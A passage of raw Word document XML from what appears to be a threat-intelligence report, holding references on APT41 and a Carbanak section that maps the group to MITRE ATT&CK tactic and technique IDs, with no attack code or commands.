    <w:p w14:paraId="2502E29E" w14:textId="77777777" w:rsidR="00B247F6" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Inside the ASUS Supply Chain Attack (morphisec.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019] (via Google Search “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t>asus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t>suppply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t xml:space="preserve"> chain attack</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5817D592" w14:textId="77777777" w:rsidR="00537851" w:rsidRDefault="00B247F6" w:rsidP="00D77A9F">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">202209221300_APT41 and Recent </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Activity_TLPWHITE</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> (hhs.gov)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2022] (via Google Search </w:t>
      </w:r>
      <w:r w:rsidRPr="00B247F6">
        <w:t>APT41 healthcare backdoor dropped</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8B510" w14:textId="77777777" w:rsidR="00083AA6" w:rsidRDefault="00537851" w:rsidP="00D77A9F">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId121" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>APT41, Wicked Panda, Group G0096 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="376BE14A" w14:textId="77777777" w:rsidR="009E0D68" w:rsidRDefault="00083AA6" w:rsidP="00D77A9F">
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:hyperlink r:id="rId122" w:anchor="id4" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Higaisa</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> or </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Winnti</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>? APT41 backdoors, old and new (ptsecurity.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="533FBD13" w14:textId="6DB8F7E4" w:rsidR="00D77A9F" w:rsidRDefault="009E0D68" w:rsidP="00D77A9F">
      <w:r>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>PlugX</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>, Software S0013 | MITRE ATT&amp;CK®</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00D77A9F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AFF506" w14:textId="33990D62" w:rsidR="007A1FAD" w:rsidRDefault="00B23A0C" w:rsidP="007A1FAD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc153480876"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2157D2DB" w14:textId="77777777" w:rsidR="007A1FAD" w:rsidRPr="005B4630" w:rsidRDefault="007A1FAD" w:rsidP="007A1FAD">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc153480877"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w14:paraId="0E89D907" w14:textId="77777777" w:rsidR="00C93C35" w:rsidRPr="00C93C35" w:rsidRDefault="00C93C35" w:rsidP="00C93C35">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0008 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Carbanak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595790E5" w14:textId="77777777" w:rsidR="00C93C35" w:rsidRPr="00C93C35" w:rsidRDefault="00C93C35" w:rsidP="00C93C35">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E999B" w14:textId="77777777" w:rsidR="00C93C35" w:rsidRPr="00C93C35" w:rsidRDefault="00C93C35" w:rsidP="00C93C35">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is UA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B377ED0"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B08D18B"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1588.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5BB57B"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E36C7"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04985D51"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440AAEA"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE9BF95"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1543.003', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6567722C"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B54923">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B54923">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C93E0EB"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r w:rsidRPr="00B54923">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B54923">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B54923">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60287687"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1543.003', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B580D1C" w14:textId="77777777" w:rsidR="00C93C35" w:rsidRPr="00DD0816" w:rsidRDefault="00C93C35" w:rsidP="00C93C35">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD0816">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD0816">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFBAC82" w14:textId="77777777" w:rsidR="00C93C35" w:rsidRPr="00DD0816" w:rsidRDefault="00C93C35" w:rsidP="00C93C35">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD0816">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DD0816">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD0816">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1115E00E"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1036.004', 'T1218.011', 'T1562.004', 'T1036.005', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4130FC"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1036.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Masquerade Task or Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5300FA5A"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6791417C"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1562.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable or Modify System Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A1660"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B90D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B90D98">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E894308"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD61CC"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FDAB6B"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA61FAE"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1A4110"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3EB709"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1219', 'T1102.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A00C542"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r w:rsidRPr="00B54923">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B54923">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1219 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B54923">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Access Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C71E2" w14:textId="77777777" w:rsidR="00C93C35" w:rsidRPr="00C93C35" w:rsidRDefault="00C93C35" w:rsidP="00C93C35">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC3894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1102.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC3894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9BD13" w14:textId="77777777" w:rsidR="00C93C35" w:rsidRPr="00C93C35"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A253E" w14:textId="3C6750CD" w:rsidR="00C93C35" w:rsidRPr="0025199D" w:rsidRDefault="00C93C35" w:rsidP="00C93C35">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93C35">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
